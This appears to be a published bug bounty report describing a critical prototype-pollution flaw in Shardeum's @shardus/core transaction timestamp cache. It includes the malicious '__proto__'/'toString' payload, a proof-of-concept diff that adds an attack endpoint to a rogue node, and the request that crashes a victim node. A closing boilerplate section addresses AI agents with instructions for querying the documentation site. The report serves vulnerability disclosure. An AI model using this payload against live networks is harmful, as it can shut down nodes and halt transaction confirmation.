# 34353 - \[BC - Critical] Killing nodes by polluting tx timestamp cache o... Submitted on Aug 10th 2024 at 01:29:47 UTC by @ZhouWu for [Boost | Shardeum: Core](https://immunefi.com/bounty/shardeum-core-boost/) Report ID: #34353 Report type: Blockchain/DLT Report severity: Critical Target: Impacts: * Network not being able to confirm new transactions (total network shutdown) ## Description ## Description In the @shardus/core source code repo, node store a cache of transaction timestamp. Other node will ask the cache, if it's a miss the node will create new transaction timestamp cache object derived from payload of the request. This mean that malicious party can launch a modified node, send the polluted payload to victim node via `get_tx_timestamp` cache ask endpoint. Subsequently killing the victim node. ## Vulnerability This happen due to the cache holder node will create a transaction timestamp object if the timestamp for given transaction not found in its own cache. The problem lies within the way the cache is created. ``` this.txTimestampCache[signedTsReceipt.cycleCounter][txId] = signedTsReceipt ``` This way of referencing the cache object to assign a value is dangerous, because the referenced element come straight from the request payload. With that in mind consider the following payload ``` { cycleMarker: "__proto__", cycleCounter: "__proto__", txId: "toString" } ``` This mean that the cache object will be created in the following way ``` this.txTimestampCache["__proto__"]["toString"] = signedTsReceipt ``` Essentially overwriting the prototype of the cache object, and the `toString` method of the cache object. This is problematic because `toString` is polluted to be a literal string which in turns break the code of the victim when stringify operations are done later down the stream. ## Proof of Concept * Launch a network of legit nodes. * Launch an attacker node with this patch applied to shardus/core * Wait for the attacker node to go active ```diff diff --git a/src/utils/nestedCounters.ts b/src/utils/nestedCounters.ts index 3ebbb782..5fbe9796 100644 --- a/src/utils/nestedCounters.ts +++ b/src/utils/nestedCounters.ts @@ -5,6 +5,11 @@ import Crypto from '../crypto' import { isDebugModeMiddleware, isDebugModeMiddlewareLow } from '../network/debugMiddleware' import { getNetworkTimeOffset, shardusGetTime } from '../network' import { Utils } from '@shardus/types' +import { InternalRouteEnum } from '../types/enum/InternalRouteEnum' +import { getTxTimestampReq, serializeGetTxTimestampReq } from '../types/GetTxTimestampReq' +import { deserializeGetTxTimestampResp, getTxTimestampResp } from '../types/GetTxTimestampResp' +import * as crypto from "crypto" + type CounterMap = Map interface CounterNode { @@ -32,6 +37,30 @@ class NestedCounters { } registerEndpoints(): void { + + Context.network.registerExternalGet('launch-attk', async (req, res)=>{ + + const victim = req.query.victim as string + + const node = Context.shardus.getNodeByPubKey(victim) + + const cycleMarker = crypto.randomBytes(254).toString() + + const cycleCounter = "__proto__" + + const txId = "toString" + + const payload = { + cycleMarker, + cycleCounter, + txId + } + + const data = await Context.p2p.ask(node, "get_tx_timestamp", payload, false) + + res.send(data) + }) + Context.network.registerExternalGet('counts', isDebugModeMiddlewareLow, (req, res) => { profilerInstance.scopedProfileSectionStart('counts') ``` * Send a request to the attacker node with the victim node public key as a query parameter * `GET http://localhost:1337/launch-attk?victim=` * observe the logs, the node exit unCleanly, essentially killing the node. ## Impact This is pretty straight forward single node attack, the script can be modified to attack the whole network to kill the whole network. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://reports.immunefi.com/shardeum-core/34353-bc-critical-killing-nodes-by-polluting-tx-timestamp-cache-o....md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.